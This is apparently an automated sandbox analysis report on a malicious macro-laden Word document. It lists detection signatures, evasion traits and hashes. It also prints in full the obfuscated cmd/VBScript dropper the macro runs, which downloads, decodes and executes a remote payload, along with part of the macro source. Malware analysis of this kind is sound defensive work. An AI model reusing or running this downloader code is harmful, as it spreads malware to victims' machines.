Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 17.0.0 |
Analysis ID: | 204882 |
Start time: | 17:38:44 |
Joe Sandbox Product: | Cloud |
Start date: | 12.01.2017 |
Overall analysis duration: | 0h 4m 39s |
Report type: | full |
Sample file name: | k-25ss9tv61sm78f_35s.rtf |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies |
|
Detection: | MAL |
Classification: | mal84.evad.expl.winRTF@6/14@0/0 |
HCA Information: |
|
EGA Information: | Failed |
Cookbook Comments: |
|
Warnings: |
|
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 84 | 0 - 100 | Report FP / FN |
Confidence |
---|
Strategy | Score | Range | Further Analysis Required? | Confidence | |
---|---|---|---|---|---|
Threshold | 5 | 0 - 5 | false |
Classification |
---|
Analysis Advice |
---|
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely requires more UI automation |
Signature Overview |
---|
Software Vulnerabilities: |
---|
Allocates a big amount of memory (probably used for heap spraying) |
Source: winword.exe | Memory has grown: |
Document exploit detected (process start blacklist hit) |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Networking: |
---|
Urls found in memory or binary data |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: | ||
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr | String found in binary or memory: |
Downloads files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Found strings which match to known social media urls |
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: | ||
Source: WINWORD.EXE | String found in binary or memory: |
Potential malicious VBS script found (has network functionality) |
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Persistence and Installation Behavior: |
---|
Command shell drops VBS files |
Source: C:\Windows\System32\cmd.exe | File created: |
Data Obfuscation: |
---|
Obfuscated document found, RTF is a DOCX |
Source: k-25ss9tv61sm78f_35s.rtf | Initial file: |
System Summary: |
---|
Checks whether correct version of .NET is installed |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Executable creates window controls seldom found in malware |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Window found: |
Found graphical window changes (likely an installer) |
Source: Window Recorder | Window detected: |
Checks if Microsoft Office is installed |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File opened: |
Binary contains paths to debug symbols |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Classification label |
Source: classification engine | Classification label: |
Creates files inside the user directory |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Creates temporary files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Executes visual basic scripts |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Reads ini files |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Reads software policies |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Spawns processes |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Uses an in-process (OLE) Automation server |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Document contains embedded VBA macros |
Source: k-25ss9tv61sm78f_35s.rtf | OLE indicator, VBA macros: |
Document misses a certain OLE stream usually present in this Microsoft Office document type |
Source: k-25ss9tv61sm78f_35s.rtf | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Reads the hosts file |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: DocumeNt_OPen |
Document contains an embedded VBA macro which may execute processes |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: K9 |
Document contains an embedded VBA macro with suspicious strings |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: | |||
Source: VBA code instrumentation | OLE, VBA macro: | Name: K9 |
Potential malicious VBS script found (suspicious strings) |
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Very long command line found |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
HIPS / PFW / Operating System Protection Evasion: |
---|
May try to detect the Windows Explorer process (often used for injection) |
Source: WINWORD.EXE, wscript.exe | Binary or memory string: | ||
Source: WINWORD.EXE, wscript.exe | Binary or memory string: | ||
Source: WINWORD.EXE, wscript.exe | Binary or memory string: |
Anti Debugging: |
---|
Creates guard pages, often used to prevent reverse engineering and debugging |
Source: C:\Windows\System32\cmd.exe | Memory protected: |
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) |
Source: C:\Windows\System32\wscript.exe | System information queried: |
Malware Analysis System Evasion: |
---|
Found WSH timer for Javascript or VBS script (likely evasive script) |
Source: C:\Windows\System32\wscript.exe | Window found: |
Potential evasive VBS script found (sleep loop) |
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Potential evasive VBS script found (use of timer() function in loop) |
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messsages (SetErrorMode) |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Queries time zone information |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Yara Overview |
---|
No Yara matches |
---|
Startup |
---|
|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
Contacted Domains/Contacted IPs |
---|
Static File Info |
---|
General | |
---|---|
File type: | Microsoft Word 2007+ |
TrID: |
|
File name: | k-25ss9tv61sm78f_35s.rtf |
File size: | 111687 |
MD5: | 58258b89e076c4d378436f3b03682402 |
SHA1: | 1f10ad2812c48ceb7d2d2235ea7964a4c7b9bd56 |
SHA256: | edd557fa4e85f7d5429d74b7708607e9bdb848d0a7f55bdad79b163642c44bf6 |
SHA512: | 0179e8dfdcde9b9e79a263549ec0579367312514d8a4eeef9adf2cb0b833d8a7c789dc1b9cc913e399442243c6717b166044e82ca5ac581a34d9ff8aa8f562d7 |
File Content Preview: | PK..........!..Pg.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "word/vbaProject.bin" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 25519 |
---|
General | |
---|---|
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 25519 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
VBA File Name: UserForm1.frm, Stream Size: 1157 |
---|
General | |
---|---|
Stream Path: | VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 1157 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 484 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 484 |
Entropy: | 5.3272379526 |
Base64 Encoded: | True |
Stream Path: PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.29226192431 |
Base64 Encoded: | False |
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 291 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 291 |
Entropy: | 4.60507024638 |
Base64 Encoded: | True |
Stream Path: UserForm1/f, File Type: data, Stream Size: 131 |
---|
General | |
---|---|
Stream Path: | UserForm1/f |
File Type: | data |
Stream Size: | 131 |
Entropy: | 3.58523835821 |
Base64 Encoded: | False |
Stream Path: UserForm1/o, File Type: data, Stream Size: 16036 |
---|
General | |
---|---|
Stream Path: | UserForm1/o |
File Type: | data |
Stream Size: | 16036 |
Entropy: | 3.15372473478 |
Base64 Encoded: | False |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3840 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3840 |
Entropy: | 4.75359525678 |
Base64 Encoded: | False |
Stream Path: VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 779 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | VAX-order 68K Blit (standalone) executable |
Stream Size: | 779 |
Entropy: | 6.43801953066 |
Base64 Encoded: | True |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
System Behavior |
---|
General |
---|
Start time: | 17:39:18 |
Start date: | 12/01/2017 |
Path: | C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0xbb0000 |
File size: | 1923232 bytes |
MD5 hash: | FEC5FFC0B51C78D9376A74CD2855D479 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:39:32 |
Start date: | 12/01/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | 'C:\Windows\System32\cmd.exe' /V /C set 'GBG=C:\Users\sofwilliams\AppData\Roaming\%RANDOM%.vbs' && (for %i in ('DIm DxF3znV' 'FunCTIoN RM7H(TqP,SUpcFxy)' 'BCGW2=65' 'dIM Qiw,O2ErlP,PEd4' 'Qo1rh7B=85' 'fOr Qiw=1 tO (Len(TqP)/2)' 'O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))' 'PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))' 'RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))' 'NEXt' 'RCTUfL=22' 'EnD fUncTIOn' 'Cllae0=23' 'KyzlwC' 'sUB KyzlwC()' 'OF=45' 'DIm Tw,Jl,WC8fC' 'Ui=84' 'Tw=96824294' 'KNatGfc=89' 'FOr Jl=1 tO Tw' 'WC8fC=WC8fC+1' 'NexT' 'Xt=77' 'iF WC8fC=Tw Then' 'Ep8UXJ=64' 'Mule6z((1336770/4951))' 'DFyX5SF=24' 'PbE0o(RM7H('2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30','WCM'))' 'N08kbpy=70' 'eLsE' 'TeDg=46' 'SG5Ave=28' 'EnD iF' 'TSoUPG=33' 'EnD suB' 'FUnCTIoN XtPB7z2(C9NbQom)' 'PkAKI0E=14' 'XtPB7z2=Chr(C9NbQom)' 'LK=15' 'eND FuNCTiON' 'SuB Wusodn4()' 'XuOFto5=43' 'Dim UQFOGB, KJk' 'For UQFOGB = 38 To 9000267' 'KJk = RyQrP + 83 + 80 + 90' 'Next' 'DVYff=1' 'End sUB' 'SUb M0cJLn()' 'NM=43' 'diM VW,ELc,PCds,BjuC5aE' 'NH=28' 'PCds=''''' 'Mt=19' 'ELc=DxF3znV & TKsHu & RM7H('7D045507','NSp8wZ0')' 'RQwDOV=4' 'MNs9uB DxF3znV,ELc' 'O5t=91' 'iF BjuC5aE='' THen Mule6z(4)' 'L1ksUsW=17' 'VW='SIrWOMB'' 'LwjuV=31' 'SEt BwZn=cREaTeOBject(RM7H('1E21343D24322767213F2A212E',VW))' 'BVv1A=80' 'BwZn.RUn RM7H('2D1C2F6F1D4E266E5E08612B62021C256B635A1661','CNqKAx6') & ELc & PCds,8134-8134,2260-2260' 'TIbnnCE=13' 'End Sub' 'SuB SsQ()' 'P1t=5' 'dIM NgoLmHV,TGr' 'Cv80c3=62' 'Do WhIle NgoLmHV<>5317-5316' 'TGr=TGr+1' 'WSCript.sLEEP(28)' 'Loop' 'D1zerr=83' 'EnD sUB' 'sUb Mule6z(RevOKyJ)' 'WQ50Sb6=91' 'DiM LpZsh' 'QW=34' 'LpZsh=timER+RevOKyJ' 'dO whIle TiMeR<LpZsh' 'wSCRiPt.Sleep(2)' 'Loop' 'Er8g9=8' 'EnD sUB' 'fUNCtion TKsHu()' 'GtkE=70' 'TKsHu=SecONd(TImE)' 'OZgqxC=48' 'enD fUnCTioN' 'FUncTioN PbE0o(SE1cf)' 'ReuR=18' 'dIM RAOx,XkSvP,CNlxWn,EPNWwO,PQMM' 'YVYNy=1' 'On erroR reSUmE NeXt' 'ARJH8=74' 'CNlxWn='QAMNVmL'' 'R0VOo=25' 
'sET RAOx=crEATEobjECT(RM7H('161E2D24043C256F1E26330120',CNlxWn))' 'LRRQfm=62' 'Wusodn4' 'X77kzx=91' 'Set OAmVp=RAOx.ENVirOnMeNT(RM7H('33250E20321230','Acw'))' 'XIzNEID=1' 'DxF3znV=OAmVp(RM7H('13110413131515','WRAT'))&XtPB7z2((830-738))& TKsHu & TKsHu' 'TC3=16' 'EPNWwO='IHCr'' 'I5DpS=10' 'SeT XkSvP=crEatEobJEcT(RM7H('052A113B27301D2F3C6D2A04040B261D18',EPNWwO))' 'KU=48' 'XkSvP.OPen RM7H('0E713D','XI4i0'),SE1cf,9990-9990' 'Ie=16' 'XkSvP.SEtRequeSTheaDer RM7H('1F5409572A','QM5g0OA'),RM7H('3320022422644371686A5B','AQYv')' 'YYYHtq1=70' 'XkSvP.SEnD()' 'X0E0=33' 'if XkSvP.STAtuSTExt=RM7H('13122A371A392F531B2C1D2C261D2C','XCs') then' 'SqN2=57' 'Wusodn4' 'GX=46' 'Mule6z(4)' 'Yad=55' 'FH XkSvP.rEspoNseBoDY' 'MMA=83' 'Else' 'Wuc8=82' 'PQMM='E3rz'' 'X6KS=14' 'SeT XkSvP= creatEoBJECt(RM7H('7E1B19375C011523475C22087F3A2E1163',PQMM))' 'BjdWH=29' 'XkSvP.OpeN RM7H('292B35','Mnna0kE'),RM7H('5E30324074196B2F5423572D355F20182A2344615033685A3E51','N6DF0' ),9751-9751' 'VcHw=29' 'XkSvP.sEtrEqUeSTHEaDEr RM7H('332E0F2804','Oa'),RM7H('542A4628456E077D0F601F','M6S2')' 'VMX=37' 'XkSvP.SEnD()' 'QSABO=86' 'If XkSvP.StatUSTeXT=RM7H('2350304D252E1F110156223B165F36','Os1B9L') tHEn FH XkSvP.responSeBODy' 'I3D=66' 'Jhd=59' 'end if' 'OFqx1=45' 'End FUncTIOn' 'sUb FH(YAuf)' 'Yn=86' 'dIm M5,Y9zz983' 'O9zJmIO=30' 'Y9zz983='XF'' 'PMY=63' 'SEt M5=createObJECt(RM7H('071C091C0476152C343D2735',Y9zz983))' 'VZ1=19' 'M5.OpeN' 'YVIgE=35' 'M5.TYpE=9542-9541' 'FH5xrC=28' 'M5.WritE YAuf' 'WN8ajm=73' 'M5.sAVetoFiLe DxF3znV,5206-5204' 'QKYC=21' 'M5.cLoSE' 'FzUz8m=8' 'M0cJLn' 'Iw6Z=36' 'eND SUb' 'funcTioN MZrD(QAd)' 'JrGZqM=95' 'MZrD=ASc(QAd)' 'GvVffY=48' 'enD FuNcTiON' 'funCTion MNs9uB(LXzuy,NUa)' 'SOv6=61' 'dIm GH7,KJkz,AdyAC,OPkR,Fp(7)' 'KA=45' 'Fp(1)=106' 'IXQyb=39' 'Fp(6)=115' 'CFw=41' 'Fp(2)=118' 'RwOAf4r=86' 'Fp(3)=103' 'U0r=78' 'Fp(7)=111' 'MJ56ht=71' 'Fp(4)=116' 'KTBrm=13' 'Fp(0)=115' 'CtMg=90' 'Fp(5)=104' 'GJQ=89' 'PSKfp1=28' 'sET GH7=cREaTEobjEct(RM7H('002431302538253D206D1F3C2029003E302D302103312D263A21', 
'LSGCYUL'))' 'PeN5TC8=50' 'Set KJkz=GH7.gETfilE(LXzuy)' 'XcYZQp=30' 'sET OPkR=KJkz.oPenastExtstrEaM(733-732,8036-8036)' 'DXG=52' 'sEt AdyAC=GH7.CREaTETextFile(NUa,239-238,3016-3016)' 'RU0xHi=89' 'dO UntIl OPkR.AtENdOfstrEam' 'AdyAC.WrITe XtPB7z2(KLGYdz(MZrD(OPkR.reAd(4298-4297)),Fp(0)))' 'LOOp' 'Uu48fY=88' 'AdyAC.CLOse' 'Oc=29' 'OPkR.CLOse' 'FTHurcs=65' 'End fuNCtIOn' 'fUNCtIon KLGYdz(Qtoxg,Fjo)' 'RsgNc=91' 'KLGYdz=(Qtoxg ANd Not Fjo)Or(noT Qtoxg aND Fjo)' 'Pq4oC=28' 'eNd fUnction') do @echo %~i)>'!GBG!' && start '' '!GBG!' |
Imagebase: | 0x4a170000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:39:36 |
Start date: | 12/01/2017 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | 'C:\Windows\System32\WScript.exe' 'C:\Users\sofwilliams\AppData\Roaming\21924.vbs' |
Imagebase: | 0x771a0000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
9 | Dim RAOvP() as Byte |
10 | Dim Um56UX(2721 + 6279) as Long, UMU(77732226 / 7774) as Long |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Split | |
Label1 | |
CreateObject | CreateObject("Wscript.Shell") |
Run | IWshShell3.Run("cmd.exe /V /C set "GBG=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm DxF3znV" "FunCTIoN RM7H(TqP,SUpcFxy)" "BCGW2=65" "dIM Qiw,O2ErlP,PEd4" "Qo1rh7B=85" "fOr Qiw=1 tO (Len(TqP)/2)" "O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))" "PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))" "RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))" "NEXt" "RCTUfL=22" "EnD fUncTIOn" "Cllae0=23" "KyzlwC" "sUB KyzlwC()" "OF=45" "DIm Tw,Jl,WC8fC" "Ui=84" "Tw=96824294" "KNatGfc=89" "FOr Jl=1 tO Tw" "WC8fC=WC8fC+1" "NexT" "Xt=77" "iF WC8fC=Tw Then" "Ep8UXJ=64" "Mule6z((1336770/4951))" "DFyX5SF=24" "PbE0o(RM7H("2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30","WCM"))" "N08kbpy=70" "eLsE" "TeDg=46" "SG5Ave=28" "EnD iF" "TSoUPG=33" "EnD suB" "FUnCTIoN XtPB7z2(C9NbQom)" "PkAKI0E=14" "XtPB7z2=Chr(C9NbQom)" "LK=15" "eND FuNCTiON" "SuB Wusodn4()" "XuOFto5=43" "Dim UQFOGB, KJk" "For UQFOGB = 38 To 9000267" "KJk = RyQrP + 83 + 80 + 90" "Next" "DVYff=1" "End sUB" "SUb M0cJLn()" "NM=43" "diM VW,ELc,PCds,BjuC5aE" "NH=28" "PCds=""""" "Mt=19" "ELc=DxF3znV & TKsHu & RM7H("7D045507","NSp8wZ0")" "RQwDOV=4" "MNs9uB DxF3znV,ELc" "O5t=91" "iF BjuC5aE="" THen Mule6z(4)" "L1ksUsW=17" "VW="SIrWOMB"" "LwjuV=31" "SEt BwZn=cREaTeOBject(RM7H("1E21343D24322767213F2A212E",VW))" "BVv1A=80" "BwZn.RUn RM7H("2D1C2F6F1D4E266E5E08612B62021C256B635A1661","CNqKAx6") & ELc & PCds,8134-8134,2260-2260" "TIbnnCE=13" "End Sub" "SuB SsQ()" "P1t=5" "dIM NgoLmHV,TGr" "Cv80c3=62" "Do WhIle NgoLmHV<>5317-5316" "TGr=TGr+1" "WSCript.sLEEP(28)" "Loop" "D1zerr=83" "EnD sUB" "sUb Mule6z(RevOKyJ)" "WQ50Sb6=91" "DiM LpZsh" "QW=34" "LpZsh=timER+RevOKyJ" "dO whIle TiMeR<LpZsh" "wSCRiPt.Sleep(2)" "Loop" "Er8g9=8" "EnD sUB" "fUNCtion TKsHu()" "GtkE=70" "TKsHu=SecONd(TImE)" "OZgqxC=48" "enD fUnCTioN" "FUncTioN PbE0o(SE1cf)" "ReuR=18" "dIM RAOx,XkSvP,CNlxWn,EPNWwO,PQMM" "YVYNy=1" "On erroR reSUmE NeXt" "ARJH8=74" "CNlxWn="QAMNVmL"" "R0VOo=25" "sET 
RAOx=crEATEobjECT(RM7H("161E2D24043C256F1E26330120",CNlxWn))" "LRRQfm=62" "Wusodn4" "X77kzx=91" "Set OAmVp=RAOx.ENVirOnMeNT(RM7H("33250E20321230","Acw"))" "XIzNEID=1" "DxF3znV=OAmVp(RM7H("13110413131515","WRAT"))&XtPB7z2((830-738))& TKsHu & TKsHu" "TC3=16" "EPNWwO="IHCr"" "I5DpS=10" "SeT XkSvP=crEatEobJEcT(RM7H("052A113B27301D2F3C6D2A04040B261D18",EPNWwO))" "KU=48" "XkSvP.OPen RM7H("0E713D","XI4i0"),SE1cf,9990-9990" "Ie=16" "XkSvP.SEtRequeSTheaDer RM7H("1F5409572A","QM5g0OA"),RM7H("3320022422644371686A5B","AQYv")" "YYYHtq1=70" "XkSvP.SEnD()" "X0E0=33" "if XkSvP.STAtuSTExt=RM7H("13122A371A392F531B2C1D2C261D2C","XCs") then" "SqN2=57" "Wusodn4" "GX=46" "Mule6z(4)" "Yad=55" "FH XkSvP.rEspoNseBoDY" "MMA=83" "Else" "Wuc8=82" "PQMM="E3rz"" "X6KS=14" "SeT XkSvP= creatEoBJECt(RM7H("7E1B19375C011523475C22087F3A2E1163",PQMM))" "BjdWH=29" "XkSvP.OpeN RM7H("292B35","Mnna0kE"),RM7H("5E30324074196B2F5423572D355F20182A2344615033685A3E51","N6DF0" ),9751-9751" "VcHw=29" "XkSvP.sEtrEqUeSTHEaDEr RM7H("332E0F2804","Oa"),RM7H("542A4628456E077D0F601F","M6S2")" "VMX=37" "XkSvP.SEnD()" "QSABO=86" "If XkSvP.StatUSTeXT=RM7H("2350304D252E1F110156223B165F36","Os1B9L") tHEn FH XkSvP.responSeBODy" "I3D=66" "Jhd=59" "end if" "OFqx1=45" "End FUncTIOn" "sUb FH(YAuf)" "Yn=86" "dIm M5,Y9zz983" "O9zJmIO=30" "Y9zz983="XF"" "PMY=63" "SEt M5=createObJECt(RM7H("071C091C0476152C343D2735",Y9zz983))" "VZ1=19" "M5.OpeN" "YVIgE=35" "M5.TYpE=9542-9541" "FH5xrC=28" "M5.WritE YAuf" "WN8ajm=73" "M5.sAVetoFiLe DxF3znV,5206-5204" "QKYC=21" "M5.cLoSE" "FzUz8m=8" "M0cJLn" "Iw6Z=36" "eND SUb" "funcTioN MZrD(QAd)" "JrGZqM=95" "MZrD=ASc(QAd)" "GvVffY=48" "enD FuNcTiON" "funCTion MNs9uB(LXzuy,NUa)" "SOv6=61" "dIm GH7,KJkz,AdyAC,OPkR,Fp(7)" "KA=45" "Fp(1)=106" "IXQyb=39" "Fp(6)=115" "CFw=41" "Fp(2)=118" "RwOAf4r=86" "Fp(3)=103" "U0r=78" "Fp(7)=111" "MJ56ht=71" "Fp(4)=116" "KTBrm=13" "Fp(0)=115" "CtMg=90" "Fp(5)=104" "GJQ=89" "PSKfp1=28" "sET GH7=cREaTEobjEct(RM7H("002431302538253D206D1F3C2029003E302D302103312D263A21", 
"LSGCYUL"))" "PeN5TC8=50" "Set KJkz=GH7.gETfilE(LXzuy)" "XcYZQp=30" "sET OPkR=KJkz.oPenastExtstrEaM(733-732,8036-8036)" "DXG=52" "sEt AdyAC=GH7.CREaTETextFile(NUa,239-238,3016-3016)" "RU0xHi=89" "dO UntIl OPkR.AtENdOfstrEam" "AdyAC.WrITe XtPB7z2(KLGYdz(MZrD(OPkR.reAd(4298-4297)),Fp(0)))" "LOOp" "Uu48fY=88" "AdyAC.CLOse" "Oc=29" "OPkR.CLOse" "FTHurcs=65" "End fuNCtIOn" "fUNCtIon KLGYdz(Qtoxg,Fjo)" "RsgNc=91" "KLGYdz=(Qtoxg ANd Not Fjo)Or(noT Qtoxg aND Fjo)" "Pq4oC=28" "eNd fUnction") do @echo %~i)>"!GBG!" && start "" "!GBG!"",0,0) -> 0 |
Strings | Decrypted Strings |
---|---|
"Ty1JxNupjQkgl" | |
"Ty1JxNupjQkgl" | |
"Kd4ScVe" | |
"Kd4ScVe" | |
"Oy7cl8WCZ2GANM8ENq9" | |
"Oy7cl8WCZ2GANM8ENq9" | |
"SglmsTsU5MQqX" | |
"SglmsTsU5MQqX" |
Line | Instruction | Meta Information |
---|---|---|
11 | Private Sub K9() | |
13 | Dim YOdozzJ() as String, PBYNz4V as Integer | executed |
14 | YOdozzJ = Split(UserForm1.Label1.Caption, IJ((2301 - 2257))) | Split Label1 |
15 | Redim RAOvP(4461) | |
16 | For PBYNz4V = 0 To 4461 | |
17 | RAOvP(PBYNz4V) = YOdozzJ(PBYNz4V) | |
18 | Next PBYNz4V | |
20 | Dim QqsXx as Long | |
21 | Dim Y38LuKe(12) as Byte, PirzfK(35) as Byte | |
22 | Y38LuKe(0) = 65 | |
23 | Y38LuKe(1) = 150 | |
24 | Y38LuKe(2) = 162 | |
26 | Y38LuKe(3) = 97 | |
27 | Y38LuKe(4) = 218 | |
28 | Y38LuKe(5) = 55 | |
30 | Y38LuKe(6) = 35 | |
31 | Y38LuKe(7) = 181 | |
32 | Y38LuKe(8) = 86 | |
34 | Y38LuKe(9) = 95 | |
35 | Y38LuKe(10) = 173 | |
36 | Y38LuKe(11) = 73 | |
37 | Y38LuKe(12) = 102 | |
39 | PirzfK(0) = 71 | |
40 | PirzfK(1) = 68 | |
41 | PirzfK(2) = 76 | |
42 | PirzfK(3) = 76 | |
43 | PirzfK(4) = 56 | |
44 | PirzfK(5) = 89 | |
46 | PirzfK(6) = 78 | |
47 | PirzfK(7) = 102 | |
48 | PirzfK(8) = 104 | |
49 | PirzfK(9) = 71 | |
50 | PirzfK(10) = 84 | |
52 | PirzfK(11) = 52 | |
53 | PirzfK(12) = 99 | |
54 | PirzfK(13) = 98 | |
56 | PirzfK(14) = 104 | |
57 | PirzfK(15) = 87 | |
58 | For QqsXx = GzYTO(Um56UX) To GzYTO(UMU) | |
59 | PirzfK(16) = JaY8xys(QqsXx, 1) | |
60 | PirzfK(17) = JaY8xys(QqsXx, 2) | |
61 | PirzfK(18) = JaY8xys(QqsXx, 3) | |
63 | PirzfK(19) = JaY8xys(QqsXx, 4) | |
64 | PirzfK(20) = PirzfK(16) | |
65 | PirzfK(21) = PirzfK(17) | |
